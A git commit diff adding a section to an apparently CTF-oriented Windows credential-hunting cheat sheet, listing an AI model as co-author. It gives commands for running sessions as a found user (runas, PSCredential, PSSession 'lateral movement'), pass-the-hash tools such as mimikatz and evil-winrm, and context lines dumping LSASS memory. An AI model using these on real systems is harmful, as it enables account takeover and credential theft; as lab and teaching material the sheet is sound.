commit 5dd2e20b2a0af378477089eee8a01c40c52532f9
parent 649ce0747272850e9e39961d03482817c8b934b4
Author: $: DAΞMON <zer0sec.xp@icloud.com>
Date: Thu, 17 Sep 2026 00:44:06 +0100
Add runas/PSCredential guide for running a session as another user
Covers CMD runas (incl. /netonly and /savecred) and PowerShell
Start-Process/New-PSSession/Invoke-Command with a PSCredential object,
plus a pointer to pass-the-hash tools when only a hash is available.
Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>
Diffstat:
1 file changed, 52 insertions(+), 0 deletions(-)
diff --git a/src/content/sheets/password-attacks/windows-credential-flag-hunting.md b/src/content/sheets/password-attacks/windows-credential-flag-hunting.md
@@ -239,6 +239,58 @@ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:
---
+## Phase 7 — Using a Found Password (run a session as another user)
+
+Once you've recovered a username + password, spawn a shell running as that user instead of just verifying the cred worked.
+
+### CMD — `runas`
+```cmd
+:: Prompts for the password interactively
+runas /user:DOMAIN\targetuser cmd
+
+:: Local (non-domain) account
+runas /user:targetuser cmd
+
+:: /netonly — use when the account is only valid on a REMOTE box (no local
+:: logon rights here); local commands still run as YOU, but anything that
+:: hits the network authenticates as targetuser. Avoids a failed local logon.
+runas /netonly /user:DOMAIN\targetuser cmd
+
+:: Reuse a credential CMD already cached (see `cmdkey /list` above)
+runas /savecred /user:DOMAIN\targetuser cmd
+```
+
+### PowerShell — build a credential object
+```powershell
+# Prompts for the password securely (or build SecureString from a known plaintext)
+$cred = Get-Credential DOMAIN\targetuser
+# Non-interactive, from a known plaintext (lab/CTF use):
+$pass = ConvertTo-SecureString 'P@ssw0rd!' -AsPlainText -Force
+$cred = New-Object System.Management.Automation.PSCredential('DOMAIN\targetuser', $pass)
+
+# New process as that user (own console window)
+Start-Process powershell -Credential $cred
+
+# Interactive shell in the CURRENT console (no new window)
+$si = New-Object System.Diagnostics.ProcessStartInfo
+$si.FileName = 'powershell.exe'
+$si.UserName = 'targetuser'; $si.Domain = 'DOMAIN'
+$si.Password = $pass
+[System.Diagnostics.Process]::Start($si)
+
+# Remote session / lateral movement as that user (WinRM must be enabled on target)
+Enter-PSSession -ComputerName TARGET -Credential $cred
+$s = New-PSSession -ComputerName TARGET -Credential $cred
+Invoke-Command -Session $s -ScriptBlock { whoami }
+
+# Run one command as the user without a full session
+Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock { whoami /all }
+```
+
+> **Note —** `runas` and `Start-Process -Credential` need the password (or hash via `/netonly` + `mimikatz sekurlsa::pth`); they don't accept an NTLM hash directly. For hash-only creds, pass-the-hash instead: `impacket-psexec`, `impacket-wmiexec`, or `evil-winrm -i TARGET -u user -H <NTLMhash>`.
+
+---
+
## Quick Wins Checklist
- [ ] `Get-Content (Get-PSReadlineOption).HistorySavePath` — PS history